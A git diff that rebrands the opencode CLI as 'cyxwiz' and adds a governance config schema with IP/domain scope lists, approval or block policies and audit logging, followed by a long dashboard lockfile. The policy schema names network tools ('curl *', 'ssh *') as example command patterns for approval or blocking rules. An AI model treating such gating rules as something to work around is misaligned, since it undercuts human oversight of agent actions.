+    if (content.includes("# cyxwiz") || content.includes(".cyxwiz/bin")) {
       return file
     }
   }
@@ -275,21 +275,21 @@ async function cleanShellConfig(file: string) {
   for (const line of lines) {
     const trimmed = line.trim()
 
-    if (trimmed === "# opencode") {
+    if (trimmed === "# cyxwiz") {
       skip = true
       continue
     }
 
     if (skip) {
       skip = false
-      if (trimmed.includes(".opencode/bin") || trimmed.includes("fish_add_path")) {
+      if (trimmed.includes(".cyxwiz/bin") || trimmed.includes("fish_add_path")) {
         continue
       }
     }
 
     if (
-      (trimmed.startsWith("export PATH=") && trimmed.includes(".opencode/bin")) ||
-      (trimmed.startsWith("fish_add_path") && trimmed.includes(".opencode"))
+      (trimmed.startsWith("export PATH=") && trimmed.includes(".cyxwiz/bin")) ||
+      (trimmed.startsWith("fish_add_path") && trimmed.includes(".cyxwiz"))
     ) {
       continue
     }
diff --git a/packages/opencode/src/cli/cmd/upgrade.ts b/packages/opencode/src/cli/cmd/upgrade.ts
index 4438fa3b84f..5ad8aa0f9ff 100644
--- a/packages/opencode/src/cli/cmd/upgrade.ts
+++ b/packages/opencode/src/cli/cmd/upgrade.ts
@@ -5,7 +5,7 @@ import { Installation } from "../../installation"
 
 export const UpgradeCommand = {
   command: "upgrade [target]",
-  describe: "upgrade opencode to the latest or a specific version",
+  describe: "upgrade cyxwiz to the latest or a specific version",
   builder: (yargs: Argv) => {
     return yargs
       .positional("target", {
@@ -27,7 +27,7 @@ export const UpgradeCommand = {
     const detectedMethod = await Installation.method()
     const method = (args.method as Installation.Method) ?? detectedMethod
     if (method === "unknown") {
-      prompts.log.error(`opencode is installed to ${process.execPath} and may be managed by a package manager`)
+      prompts.log.error(`cyxwiz is installed to ${process.execPath} and may be managed by a package manager`)
       const install = await prompts.select({
         message: "Install anyways?",
         options: [
@@ -45,7 +45,7 @@ export const UpgradeCommand = {
     const target = args.target ? args.target.replace(/^v/, "") : await Installation.latest()
 
     if (Installation.VERSION === target) {
-      prompts.log.warn(`opencode upgrade skipped: ${target} is already installed`)
+      prompts.log.warn(`cyxwiz upgrade skipped: ${target} is already installed`)
       prompts.outro("Done")
       return
     }
diff --git a/packages/opencode/src/cli/cmd/web.ts b/packages/opencode/src/cli/cmd/web.ts
index 2c207ecc2f2..3a39ffe3a1d 100644
--- a/packages/opencode/src/cli/cmd/web.ts
+++ b/packages/opencode/src/cli/cmd/web.ts
@@ -31,7 +31,7 @@ function getNetworkIPs() {
 export const WebCommand = cmd({
   command: "web",
   builder: (yargs) => withNetworkOptions(yargs),
-  describe: "start opencode server and open web interface",
+  describe: "start cyxwiz server and open web interface",
   handler: async (args) => {
     if (!Flag.OPENCODE_SERVER_PASSWORD) {
       UI.println(UI.Style.TEXT_WARNING_BOLD + "!  " + "OPENCODE_SERVER_PASSWORD is not set; server is unsecured.")
diff --git a/packages/opencode/src/cli/ui.ts b/packages/opencode/src/cli/ui.ts
index acd1383a070..cecdae91c33 100644
--- a/packages/opencode/src/cli/ui.ts
+++ b/packages/opencode/src/cli/ui.ts
@@ -4,10 +4,9 @@ import { NamedError } from "@opencode-ai/util/error"
 
 export namespace UI {
   const LOGO = [
-    [`                    `, `             ▄     `],
-    [`█▀▀█ █▀▀█ █▀▀█ █▀▀▄ `, `█▀▀▀ █▀▀█ █▀▀█ █▀▀█`],
-    [`█░░█ █░░█ █▀▀▀ █░░█ `, `█░░░ █░░█ █░░█ █▀▀▀`],
-    [`▀▀▀▀ █▀▀▀ ▀▀▀▀ ▀  ▀ `, `▀▀▀▀ ▀▀▀▀ ▀▀▀▀ ▀▀▀▀`],
+    [`█▀▀▀ █░░█ █░█ `, `█░░░█ ▀█▀ ▀▀█`],
+    [`█░░░ ▀▄▄█ ░█░ `, `█░█░█ ░█░ ▄▄█`],
+    [`▀▀▀▀ ░░░█ █░█ `, `░▀░▀░ ▀▀▀ ▀▀▀`],
   ]
 
   export const CancelledError = NamedError.create("UICancelledError", z.void())
diff --git a/packages/opencode/src/config/config.ts b/packages/opencode/src/config/config.ts
index f77fb854bed..618cc174dff 100644
--- a/packages/opencode/src/config/config.ts
+++ b/packages/opencode/src/config/config.ts
@@ -1003,6 +1003,54 @@ export namespace Config {
           prune: z.boolean().optional().describe("Enable pruning of old tool outputs (default: true)"),
         })
         .optional(),
+      governance: z
+        .object({
+          enabled: z.boolean().default(false).describe("Enable governance engine for scope and policy enforcement"),
+          scope: z
+            .object({
+              ip: z
+                .object({
+                  allow: z.array(z.string()).optional().describe("Allowed IP addresses or CIDR ranges"),
+                  deny: z.array(z.string()).optional().describe("Blocked IP addresses or CIDR ranges"),
+                })
+                .optional(),
+              domain: z
+                .object({
+                  allow: z.array(z.string()).optional().describe("Allowed domain patterns (glob-style, e.g., '*.example.com')"),
+                  deny: z.array(z.string()).optional().describe("Blocked domain patterns"),
+                })
+                .optional(),
+            })
+            .optional()
+            .describe("Scope restrictions for network targets"),
+          policies: z
+            .array(
+              z.object({
+                action: z.enum(["auto-approve", "require-approval", "blocked"]).describe("Policy action"),
+                tools: z.array(z.string()).optional().describe("Tool patterns (e.g., 'bash', 'webfetch', 'mcp:*')"),
+                commands: z.array(z.string()).optional().describe("Command patterns for bash tool (e.g., 'curl *', 'ssh *')"),
+                targets: z.array(z.string()).optional().describe("Target patterns (domains/IPs)"),
+                description: z.string().optional().describe("Human-readable policy description"),
+              })
+            )
+            .optional()
+            .describe("Policy rules evaluated in order, first match wins"),
+          default_action: z
+            .enum(["auto-approve", "require-approval", "blocked"])
+            .default("require-approval")
+            .describe("Default action when no policy matches"),
+          audit: z
+            .object({
+              enabled: z.boolean().default(true).describe("Enable audit logging"),
+              storage: z.enum(["file", "memory"]).default("file").describe("Audit log storage backend"),
+              retention: z.number().int().positive().optional().describe("Days to retain audit logs"),
+              include_args: z.boolean().default(false).describe("Include tool arguments in audit log"),
+            })
+            .optional()
+            .describe("Audit logging configuration"),
+        })
+        .optional()
+        .describe("Governance engine for scope enforcement, policy rules, and audit logging"),
       experimental: z
         .object({
           hook: z
diff --git a/packages/opencode/src/dashboard/bun.lock b/packages/opencode/src/dashboard/bun.lock
new file mode 100644
index 00000000000..f7be1a372d5
--- /dev/null
+++ b/packages/opencode/src/dashboard/bun.lock
@@ -0,0 +1,405 @@
+{
+  "lockfileVersion": 1,
+  "configVersion": 1,
+  "workspaces": {
+    "": {
+      "name": "@opencode/dashboard",
+      "dependencies": {
+        "@solidjs/router": "^0.15.3",
+        "solid-js": "^1.9.4",
+      },
+      "devDependencies": {
+        "@types/node": "^22.10.2",
+        "autoprefixer": "^10.4.20",
+        "postcss": "^8.4.49",
+        "tailwindcss": "^3.4.17",
+        "typescript": "^5.7.2",
+        "vite": "^6.0.6",
+        "vite-plugin-solid": "^2.11.0",
+      },
+    },
+  },
+  "packages": {
+    "@alloc/quick-lru": ["@alloc/quick-lru@5.2.0", "", {}, "sha512-UrcABB+4bUrFABwbluTIBErXwvbsU/V7TZWfmbgJfbkwiBuziS9gxdODUyuiecfdGQ85jglMW6juS3+z5TsKLw=="],
+
+    "@babel/code-frame": ["@babel/code-frame@7.28.6", "", { "dependencies": { "@babel/helper-validator-identifier": "^7.28.5", "js-tokens": "^4.0.0", "picocolors": "^1.1.1" } }, "sha512-JYgintcMjRiCvS8mMECzaEn+m3PfoQiyqukOMCCVQtoJGYJw8j/8LBJEiqkHLkfwCcs74E3pbAUFNg7d9VNJ+Q=="],
+
+    "@babel/compat-data": ["@babel/compat-data@7.28.6", "", {}, "sha512-2lfu57JtzctfIrcGMz992hyLlByuzgIk58+hhGCxjKZ3rWI82NnVLjXcaTqkI2NvlcvOskZaiZ5kjUALo3Lpxg=="],
+
+    "@babel/core": ["@babel/core@7.28.6", "", { "dependencies": { "@babel/code-frame": "^7.28.6", "@babel/generator": "^7.28.6", "@babel/helper-compilation-targets": "^7.28.6", "@babel/helper-module-transforms": "^7.28.6", "@babel/helpers": "^7.28.6", "@babel/parser": "^7.28.6", "@babel/template": "^7.28.6", "@babel/traverse": "^7.28.6", "@babel/types": "^7.28.6", "@jridgewell/remapping": "^2.3.5", "convert-source-map": "^2.0.0", "debug": "^4.1.0", "gensync": "^1.0.0-beta.2", "json5": "^2.2.3", "semver": "^6.3.1" } }, "sha512-H3mcG6ZDLTlYfaSNi0iOKkigqMFvkTKlGUYlD8GW7nNOYRrevuA46iTypPyv+06V3fEmvvazfntkBU34L0azAw=="],
+
+    "@babel/generator": ["@babel/generator@7.28.6", "", { "dependencies": { "@babel/parser": "^7.28.6", "@babel/types": "^7.28.6", "@jridgewell/gen-mapping": "^0.3.12", "@jridgewell/trace-mapping": "^0.3.28", "jsesc": "^3.0.2" } }, "sha512-lOoVRwADj8hjf7al89tvQ2a1lf53Z+7tiXMgpZJL3maQPDxh0DgLMN62B2MKUOFcoodBHLMbDM6WAbKgNy5Suw=="],
+
+    "@babel/helper-compilation-targets": ["@babel/helper-compilation-targets@7.28.6", "", { "dependencies": { "@babel/compat-data": "^7.28.6", "@babel/helper-validator-option": "^7.27.1", "browserslist": "^4.24.0", "lru-cache": "^5.1.1", "semver": "^6.3.1" } }, "sha512-JYtls3hqi15fcx5GaSNL7SCTJ2MNmjrkHXg4FSpOA/grxK8KwyZ5bubHsCq8FXCkua6xhuaaBit+3b7+VZRfcA=="],
+
+    "@babel/helper-globals": ["@babel/helper-globals@7.28.0", "", {}, "sha512-+W6cISkXFa1jXsDEdYA8HeevQT/FULhxzR99pxphltZcVaugps53THCeiWA8SguxxpSp3gKPiuYfSWopkLQ4hw=="],
+
+    "@babel/helper-module-imports": ["@babel/helper-module-imports@7.28.6", "", { "dependencies": { "@babel/traverse": "^7.28.6", "@babel/types": "^7.28.6" } }, "sha512-l5XkZK7r7wa9LucGw9LwZyyCUscb4x37JWTPz7swwFE/0FMQAGpiWUZn8u9DzkSBWEcK25jmvubfpw2dnAMdbw=="],
+
+    "@babel/helper-module-transforms": ["@babel/helper-module-transforms@7.28.6", "", { "dependencies": { "@babel/helper-module-imports": "^7.28.6", "@babel/helper-validator-identifier": "^7.28.5", "@babel/traverse": "^7.28.6" }, "peerDependencies": { "@babel/core": "^7.0.0" } }, "sha512-67oXFAYr2cDLDVGLXTEABjdBJZ6drElUSI7WKp70NrpyISso3plG9SAGEF6y7zbha/wOzUByWWTJvEDVNIUGcA=="],
+
+    "@babel/helper-plugin-utils": ["@babel/helper-plugin-utils@7.28.6", "", {}, "sha512-S9gzZ/bz83GRysI7gAD4wPT/AI3uCnY+9xn+Mx/KPs2JwHJIz1W8PZkg2cqyt3RNOBM8ejcXhV6y8Og7ly/Dug=="],
+
+    "@babel/helper-string-parser": ["@babel/helper-string-parser@7.27.1", "", {}, "sha512-qMlSxKbpRlAridDExk92nSobyDdpPijUq2DW6oDnUqd0iOGxmQjyqhMIihI9+zv4LPyZdRje2cavWPbCbWm3eA=="],
+
+    "@babel/helper-validator-identifier": ["@babel/helper-validator-identifier@7.28.5", "", {}, "sha512-qSs4ifwzKJSV39ucNjsvc6WVHs6b7S03sOh2OcHF9UHfVPqWWALUsNUVzhSBiItjRZoLHx7nIarVjqKVusUZ1Q=="],
+
+    "@babel/helper-validator-option": ["@babel/helper-validator-option@7.27.1", "", {}, "sha512-YvjJow9FxbhFFKDSuFnVCe2WxXk1zWc22fFePVNEaWJEu8IrZVlda6N0uHwzZrUM1il7NC9Mlp4MaJYbYd9JSg=="],
+
+    "@babel/helpers": ["@babel/helpers@7.28.6", "", { "dependencies": { "@babel/template": "^7.28.6", "@babel/types": "^7.28.6" } }, "sha512-xOBvwq86HHdB7WUDTfKfT/Vuxh7gElQ+Sfti2Cy6yIWNW05P8iUslOVcZ4/sKbE+/jQaukQAdz/gf3724kYdqw=="],
+
+    "@babel/parser": ["@babel/parser@7.28.6", "", { "dependencies": { "@babel/types": "^7.28.6" }, "bin": "./bin/babel-parser.js" }, "sha512-TeR9zWR18BvbfPmGbLampPMW+uW1NZnJlRuuHso8i87QZNq2JRF9i6RgxRqtEq+wQGsS19NNTWr2duhnE49mfQ=="],
+
+    "@babel/plugin-syntax-jsx": ["@babel/plugin-syntax-jsx@7.28.6", "", { "dependencies": { "@babel/helper-plugin-utils": "^7.28.6" }, "peerDependencies": { "@babel/core": "^7.0.0-0" } }, "sha512-wgEmr06G6sIpqr8YDwA2dSRTE3bJ+V0IfpzfSY3Lfgd7YWOaAdlykvJi13ZKBt8cZHfgH1IXN+CL656W3uUa4w=="],
+
+    "@babel/template": ["@babel/template@7.28.6", "", { "dependencies": { "@babel/code-frame": "^7.28.6", "@babel/parser": "^7.28.6", "@babel/types": "^7.28.6" } }, "sha512-YA6Ma2KsCdGb+WC6UpBVFJGXL58MDA6oyONbjyF/+5sBgxY/dwkhLogbMT2GXXyU84/IhRw/2D1Os1B/giz+BQ=="],
+
+    "@babel/traverse": ["@babel/traverse@7.28.6", "", { "dependencies": { "@babel/code-frame": "^7.28.6", "@babel/generator": "^7.28.6", "@babel/helper-globals": "^7.28.0", "@babel/parser": "^7.28.6", "@babel/template": "^7.28.6", "@babel/types": "^7.28.6", "debug": "^4.3.1" } }, "sha512-fgWX62k02qtjqdSNTAGxmKYY/7FSL9WAS1o2Hu5+I5m9T0yxZzr4cnrfXQ/MX0rIifthCSs6FKTlzYbJcPtMNg=="],
+
+    "@babel/types": ["@babel/types@7.28.6", "", { "dependencies": { "@babel/helper-string-parser": "^7.27.1", "@babel/helper-validator-identifier": "^7.28.5" } }, "sha512-0ZrskXVEHSWIqZM/sQZ4EV3jZJXRkio/WCxaqKZP1g//CEWEPSfeZFcms4XeKBCHU0ZKnIkdJeU/kF+eRp5lBg=="],
+
+    "@esbuild/aix-ppc64": ["@esbuild/aix-ppc64@0.25.12", "", { "os": "aix", "cpu": "ppc64" }, "sha512-Hhmwd6CInZ3dwpuGTF8fJG6yoWmsToE+vYgD4nytZVxcu1ulHpUQRAB1UJ8+N1Am3Mz4+xOByoQoSZf4D+CpkA=="],
+
+    "@esbuild/android-arm": ["@esbuild/android-arm@0.25.12", "", { "os": "android", "cpu": "arm" }, "sha512-VJ+sKvNA/GE7Ccacc9Cha7bpS8nyzVv0jdVgwNDaR4gDMC/2TTRc33Ip8qrNYUcpkOHUT5OZ0bUcNNVZQ9RLlg=="],
+
+    "@esbuild/android-arm64": ["@esbuild/android-arm64@0.25.12", "", { "os": "android", "cpu": "arm64" }, "sha512-6AAmLG7zwD1Z159jCKPvAxZd4y/VTO0VkprYy+3N2FtJ8+BQWFXU+OxARIwA46c5tdD9SsKGZ/1ocqBS/gAKHg=="],
+
+    "@esbuild/android-x64": ["@esbuild/android-x64@0.25.12", "", { "os": "android", "cpu": "x64" }, "sha512-5jbb+2hhDHx5phYR2By8GTWEzn6I9UqR11Kwf22iKbNpYrsmRB18aX/9ivc5cabcUiAT/wM+YIZ6SG9QO6a8kg=="],
+
+    "@esbuild/darwin-arm64": ["@esbuild/darwin-arm64@0.25.12", "", { "os": "darwin", "cpu": "arm64" }, "sha512-N3zl+lxHCifgIlcMUP5016ESkeQjLj/959RxxNYIthIg+CQHInujFuXeWbWMgnTo4cp5XVHqFPmpyu9J65C1Yg=="],
+
+    "@esbuild/darwin-x64": ["@esbuild/darwin-x64@0.25.12", "", { "os": "darwin", "cpu": "x64" }, "sha512-HQ9ka4Kx21qHXwtlTUVbKJOAnmG1ipXhdWTmNXiPzPfWKpXqASVcWdnf2bnL73wgjNrFXAa3yYvBSd9pzfEIpA=="],
+
+    "@esbuild/freebsd-arm64": ["@esbuild/freebsd-arm64@0.25.12", "", { "os": "freebsd", "cpu": "arm64" }, "sha512-gA0Bx759+7Jve03K1S0vkOu5Lg/85dou3EseOGUes8flVOGxbhDDh/iZaoek11Y8mtyKPGF3vP8XhnkDEAmzeg=="],
+
+    "@esbuild/freebsd-x64": ["@esbuild/freebsd-x64@0.25.12", "", { "os": "freebsd", "cpu": "x64" }, "sha512-TGbO26Yw2xsHzxtbVFGEXBFH0FRAP7gtcPE7P5yP7wGy7cXK2oO7RyOhL5NLiqTlBh47XhmIUXuGciXEqYFfBQ=="],
+
+    "@esbuild/linux-arm": ["@esbuild/linux-arm@0.25.12", "", { "os": "linux", "cpu": "arm" }, "sha512-lPDGyC1JPDou8kGcywY0YILzWlhhnRjdof3UlcoqYmS9El818LLfJJc3PXXgZHrHCAKs/Z2SeZtDJr5MrkxtOw=="],
+
+    "@esbuild/linux-arm64": ["@esbuild/linux-arm64@0.25.12", "", { "os": "linux", "cpu": "arm64" }, "sha512-8bwX7a8FghIgrupcxb4aUmYDLp8pX06rGh5HqDT7bB+8Rdells6mHvrFHHW2JAOPZUbnjUpKTLg6ECyzvas2AQ=="],
+
+    "@esbuild/linux-ia32": ["@esbuild/linux-ia32@0.25.12", "", { "os": "linux", "cpu": "ia32" }, "sha512-0y9KrdVnbMM2/vG8KfU0byhUN+EFCny9+8g202gYqSSVMonbsCfLjUO+rCci7pM0WBEtz+oK/PIwHkzxkyharA=="],
+
+    "@esbuild/linux-loong64": ["@esbuild/linux-loong64@0.25.12", "", { "os": "linux", "cpu": "none" }, "sha512-h///Lr5a9rib/v1GGqXVGzjL4TMvVTv+s1DPoxQdz7l/AYv6LDSxdIwzxkrPW438oUXiDtwM10o9PmwS/6Z0Ng=="],
+
+    "@esbuild/linux-mips64el": ["@esbuild/linux-mips64el@0.25.12", "", { "os": "linux", "cpu": "none" }, "sha512-iyRrM1Pzy9GFMDLsXn1iHUm18nhKnNMWscjmp4+hpafcZjrr2WbT//d20xaGljXDBYHqRcl8HnxbX6uaA/eGVw=="],
+
+    "@esbuild/linux-ppc64": ["@esbuild/linux-ppc64@0.25.12", "", { "os": "linux", "cpu": "ppc64" }, "sha512-9meM/lRXxMi5PSUqEXRCtVjEZBGwB7P/D4yT8UG/mwIdze2aV4Vo6U5gD3+RsoHXKkHCfSxZKzmDssVlRj1QQA=="],
+
+    "@esbuild/linux-riscv64": ["@esbuild/linux-riscv64@0.25.12", "", { "os": "linux", "cpu": "none" }, "sha512-Zr7KR4hgKUpWAwb1f3o5ygT04MzqVrGEGXGLnj15YQDJErYu/BGg+wmFlIDOdJp0PmB0lLvxFIOXZgFRrdjR0w=="],
+
+    "@esbuild/linux-s390x": ["@esbuild/linux-s390x@0.25.12", "", { "os": "linux", "cpu": "s390x" }, "sha512-MsKncOcgTNvdtiISc/jZs/Zf8d0cl/t3gYWX8J9ubBnVOwlk65UIEEvgBORTiljloIWnBzLs4qhzPkJcitIzIg=="],
+
+    "@esbuild/linux-x64": ["@esbuild/linux-x64@0.25.12", "", { "os": "linux", "cpu": "x64" }, "sha512-uqZMTLr/zR/ed4jIGnwSLkaHmPjOjJvnm6TVVitAa08SLS9Z0VM8wIRx7gWbJB5/J54YuIMInDquWyYvQLZkgw=="],
+
+    "@esbuild/netbsd-arm64": ["@esbuild/netbsd-arm64@0.25.12", "", { "os": "none", "cpu": "arm64" }, "sha512-xXwcTq4GhRM7J9A8Gv5boanHhRa/Q9KLVmcyXHCTaM4wKfIpWkdXiMog/KsnxzJ0A1+nD+zoecuzqPmCRyBGjg=="],
+
+    "@esbuild/netbsd-x64": ["@esbuild/netbsd-x64@0.25.12", "", { "os": "none", "cpu": "x64" }, "sha512-Ld5pTlzPy3YwGec4OuHh1aCVCRvOXdH8DgRjfDy/oumVovmuSzWfnSJg+VtakB9Cm0gxNO9BzWkj6mtO1FMXkQ=="],
+
+    "@esbuild/openbsd-arm64": ["@esbuild/openbsd-arm64@0.25.12", "", { "os": "openbsd", "cpu": "arm64" }, "sha512-fF96T6KsBo/pkQI950FARU9apGNTSlZGsv1jZBAlcLL1MLjLNIWPBkj5NlSz8aAzYKg+eNqknrUJ24QBybeR5A=="],
+
+    "@esbuild/openbsd-x64": ["@esbuild/openbsd-x64@0.25.12", "", { "os": "openbsd", "cpu": "x64" }, "sha512-MZyXUkZHjQxUvzK7rN8DJ3SRmrVrke8ZyRusHlP+kuwqTcfWLyqMOE3sScPPyeIXN/mDJIfGXvcMqCgYKekoQw=="],
+
+    "@esbuild/openharmony-arm64": ["@esbuild/openharmony-arm64@0.25.12", "", { "os": "none", "cpu": "arm64" }, "sha512-rm0YWsqUSRrjncSXGA7Zv78Nbnw4XL6/dzr20cyrQf7ZmRcsovpcRBdhD43Nuk3y7XIoW2OxMVvwuRvk9XdASg=="],
+
+    "@esbuild/sunos-x64": ["@esbuild/sunos-x64@0.25.12", "", { "os": "sunos", "cpu": "x64" }, "sha512-3wGSCDyuTHQUzt0nV7bocDy72r2lI33QL3gkDNGkod22EsYl04sMf0qLb8luNKTOmgF/eDEDP5BFNwoBKH441w=="],
+
+    "@esbuild/win32-arm64": ["@esbuild/win32-arm64@0.25.12", "", { "os": "win32", "cpu": "arm64" }, "sha512-rMmLrur64A7+DKlnSuwqUdRKyd3UE7oPJZmnljqEptesKM8wx9J8gx5u0+9Pq0fQQW8vqeKebwNXdfOyP+8Bsg=="],
+
+    "@esbuild/win32-ia32": ["@esbuild/win32-ia32@0.25.12", "", { "os": "win32", "cpu": "ia32" }, "sha512-HkqnmmBoCbCwxUKKNPBixiWDGCpQGVsrQfJoVGYLPT41XWF8lHuE5N6WhVia2n4o5QK5M4tYr21827fNhi4byQ=="],
+
+    "@esbuild/win32-x64": ["@esbuild/win32-x64@0.25.12", "", { "os": "win32", "cpu": "x64" }, "sha512-alJC0uCZpTFrSL0CCDjcgleBXPnCrEAhTBILpeAp7M/OFgoqtAetfBzX0xM00MUsVVPpVjlPuMbREqnZCXaTnA=="],
+
+    "@jridgewell/gen-mapping": ["@jridgewell/gen-mapping@0.3.13", "", { "dependencies": { "@jridgewell/sourcemap-codec": "^1.5.0", "@jridgewell/trace-mapping": "^0.3.24" } }, "sha512-2kkt/7niJ6MgEPxF0bYdQ6etZaA+fQvDcLKckhy1yIQOzaoKjBBjSj63/aLVjYE3qhRt5dvM+uUyfCg6UKCBbA=="],
+
+    "@jridgewell/remapping": ["@jridgewell/remapping@2.3.5", "", { "dependencies": { "@jridgewell/gen-mapping": "^0.3.5", "@jridgewell/trace-mapping": "^0.3.24" } }, "sha512-LI9u/+laYG4Ds1TDKSJW2YPrIlcVYOwi2fUC6xB43lueCjgxV4lffOCZCtYFiH6TNOX+tQKXx97T4IKHbhyHEQ=="],
+
+    "@jridgewell/resolve-uri": ["@jridgewell/resolve-uri@3.1.2", "", {}, "sha512-bRISgCIjP20/tbWSPWMEi54QVPRZExkuD9lJL+UIxUKtwVJA8wW1Trb1jMs1RFXo1CBTNZ/5hpC9QvmKWdopKw=="],
+
+    "@jridgewell/sourcemap-codec": ["@jridgewell/sourcemap-codec@1.5.5", "", {}, "sha512-cYQ9310grqxueWbl+WuIUIaiUaDcj7WOq5fVhEljNVgRfOUhY9fy2zTvfoqWsnebh8Sl70VScFbICvJnLKB0Og=="],
+
+    "@jridgewell/trace-mapping": ["@jridgewell/trace-mapping@0.3.31", "", { "dependencies": { "@jridgewell/resolve-uri": "^3.1.0", "@jridgewell/sourcemap-codec": "^1.4.14" } }, "sha512-zzNR+SdQSDJzc8joaeP8QQoCQr8NuYx2dIIytl1QeBEZHJ9uW6hebsrYgbz8hJwUQao3TWCMtmfV8Nu1twOLAw=="],
+
+    "@nodelib/fs.scandir": ["@nodelib/fs.scandir@2.1.5", "", { "dependencies": { "@nodelib/fs.stat": "2.0.5", "run-parallel": "^1.1.9" } }, "sha512-vq24Bq3ym5HEQm2NKCr3yXDwjc7vTsEThRDnkp2DK9p1uqLR+DHurm/NOTo0KG7HYHU7eppKZj3MyqYuMBf62g=="],
+
+    "@nodelib/fs.stat": ["@nodelib/fs.stat@2.0.5", "", {}, "sha512-RkhPPp2zrqDAQA/2jNhnztcPAlv64XdhIp7a7454A5ovI7Bukxgt7MX7udwAu3zg1DcpPU0rz3VV1SeaqvY4+A=="],
+
+    "@nodelib/fs.walk": ["@nodelib/fs.walk@1.2.8", "", { "dependencies": { "@nodelib/fs.scandir": "2.1.5", "fastq": "^1.6.0" } }, "sha512-oGB+UxlgWcgQkgwo8GcEGwemoTFt3FIO9ababBmaGwXIoBKZ+GTy0pP185beGg7Llih/NSHSV2XAs1lnznocSg=="],
+
+    "@rollup/rollup-android-arm-eabi": ["@rollup/rollup-android-arm-eabi@4.56.0", "", { "os": "android", "cpu": "arm" }, "sha512-LNKIPA5k8PF1+jAFomGe3qN3bbIgJe/IlpDBwuVjrDKrJhVWywgnJvflMt/zkbVNLFtF1+94SljYQS6e99klnw=="],
+
+    "@rollup/rollup-android-arm64": ["@rollup/rollup-android-arm64@4.56.0", "", { "os": "android", "cpu": "arm64" }, "sha512-lfbVUbelYqXlYiU/HApNMJzT1E87UPGvzveGg2h0ktUNlOCxKlWuJ9jtfvs1sKHdwU4fzY7Pl8sAl49/XaEk6Q=="],
+
+    "@rollup/rollup-darwin-arm64": ["@rollup/rollup-darwin-arm64@4.56.0", "", { "os": "darwin", "cpu": "arm64" }, "sha512-EgxD1ocWfhoD6xSOeEEwyE7tDvwTgZc8Bss7wCWe+uc7wO8G34HHCUH+Q6cHqJubxIAnQzAsyUsClt0yFLu06w=="],
+
+    "@rollup/rollup-darwin-x64": ["@rollup/rollup-darwin-x64@4.56.0", "", { "os": "darwin", "cpu": "x64" }, "sha512-1vXe1vcMOssb/hOF8iv52A7feWW2xnu+c8BV4t1F//m9QVLTfNVpEdja5ia762j/UEJe2Z1jAmEqZAK42tVW3g=="],
+
+    "@rollup/rollup-freebsd-arm64": ["@rollup/rollup-freebsd-arm64@4.56.0", "", { "os": "freebsd", "cpu": "arm64" }, "sha512-bof7fbIlvqsyv/DtaXSck4VYQ9lPtoWNFCB/JY4snlFuJREXfZnm+Ej6yaCHfQvofJDXLDMTVxWscVSuQvVWUQ=="],
+
+    "@rollup/rollup-freebsd-x64": ["@rollup/rollup-freebsd-x64@4.56.0", "", { "os": "freebsd", "cpu": "x64" }, "sha512-KNa6lYHloW+7lTEkYGa37fpvPq+NKG/EHKM8+G/g9WDU7ls4sMqbVRV78J6LdNuVaeeK5WB9/9VAFbKxcbXKYg=="],
+
+    "@rollup/rollup-linux-arm-gnueabihf": ["@rollup/rollup-linux-arm-gnueabihf@4.56.0", "", { "os": "linux", "cpu": "arm" }, "sha512-E8jKK87uOvLrrLN28jnAAAChNq5LeCd2mGgZF+fGF5D507WlG/Noct3lP/QzQ6MrqJ5BCKNwI9ipADB6jyiq2A=="],
+
+    "@rollup/rollup-linux-arm-musleabihf": ["@rollup/rollup-linux-arm-musleabihf@4.56.0", "", { "os": "linux", "cpu": "arm" }, "sha512-jQosa5FMYF5Z6prEpTCCmzCXz6eKr/tCBssSmQGEeozA9tkRUty/5Vx06ibaOP9RCrW1Pvb8yp3gvZhHwTDsJw=="],
+
+    "@rollup/rollup-linux-arm64-gnu": ["@rollup/rollup-linux-arm64-gnu@4.56.0", "", { "os": "linux", "cpu": "arm64" }, "sha512-uQVoKkrC1KGEV6udrdVahASIsaF8h7iLG0U0W+Xn14ucFwi6uS539PsAr24IEF9/FoDtzMeeJXJIBo5RkbNWvQ=="],
+
+    "@rollup/rollup-linux-arm64-musl": ["@rollup/rollup-linux-arm64-musl@4.56.0", "", { "os": "linux", "cpu": "arm64" }, "sha512-vLZ1yJKLxhQLFKTs42RwTwa6zkGln+bnXc8ueFGMYmBTLfNu58sl5/eXyxRa2RarTkJbXl8TKPgfS6V5ijNqEA=="],
+
+    "@rollup/rollup-linux-loong64-gnu": ["@rollup/rollup-linux-loong64-gnu@4.56.0", "", { "os": "linux", "cpu": "none" }, "sha512-FWfHOCub564kSE3xJQLLIC/hbKqHSVxy8vY75/YHHzWvbJL7aYJkdgwD/xGfUlL5UV2SB7otapLrcCj2xnF1dg=="],
+
+    "@rollup/rollup-linux-loong64-musl": ["@rollup/rollup-linux-loong64-musl@4.56.0", "", { "os": "linux", "cpu": "none" }, "sha512-z1EkujxIh7nbrKL1lmIpqFTc/sr0u8Uk0zK/qIEFldbt6EDKWFk/pxFq3gYj4Bjn3aa9eEhYRlL3H8ZbPT1xvA=="],
+
+    "@rollup/rollup-linux-ppc64-gnu": ["@rollup/rollup-linux-ppc64-gnu@4.56.0", "", { "os": "linux", "cpu": "ppc64" }, "sha512-iNFTluqgdoQC7AIE8Q34R3AuPrJGJirj5wMUErxj22deOcY7XwZRaqYmB6ZKFHoVGqRcRd0mqO+845jAibKCkw=="],
+
+    "@rollup/rollup-linux-ppc64-musl": ["@rollup/rollup-linux-ppc64-musl@4.56.0", "", { "os": "linux", "cpu": "ppc64" }, "sha512-MtMeFVlD2LIKjp2sE2xM2slq3Zxf9zwVuw0jemsxvh1QOpHSsSzfNOTH9uYW9i1MXFxUSMmLpeVeUzoNOKBaWg=="],
+
+    "@rollup/rollup-linux-riscv64-gnu": ["@rollup/rollup-linux-riscv64-gnu@4.56.0", "", { "os": "linux", "cpu": "none" }, "sha512-in+v6wiHdzzVhYKXIk5U74dEZHdKN9KH0Q4ANHOTvyXPG41bajYRsy7a8TPKbYPl34hU7PP7hMVHRvv/5aCSew=="],
+
+    "@rollup/rollup-linux-riscv64-musl": ["@rollup/rollup-linux-riscv64-musl@4.56.0", "", { "os": "linux", "cpu": "none" }, "sha512-yni2raKHB8m9NQpI9fPVwN754mn6dHQSbDTwxdr9SE0ks38DTjLMMBjrwvB5+mXrX+C0npX0CVeCUcvvvD8CNQ=="],
+
+    "@rollup/rollup-linux-s390x-gnu": ["@rollup/rollup-linux-s390x-gnu@4.56.0", "", { "os": "linux", "cpu": "s390x" }, "sha512-zhLLJx9nQPu7wezbxt2ut+CI4YlXi68ndEve16tPc/iwoylWS9B3FxpLS2PkmfYgDQtosah07Mj9E0khc3Y+vQ=="],
+
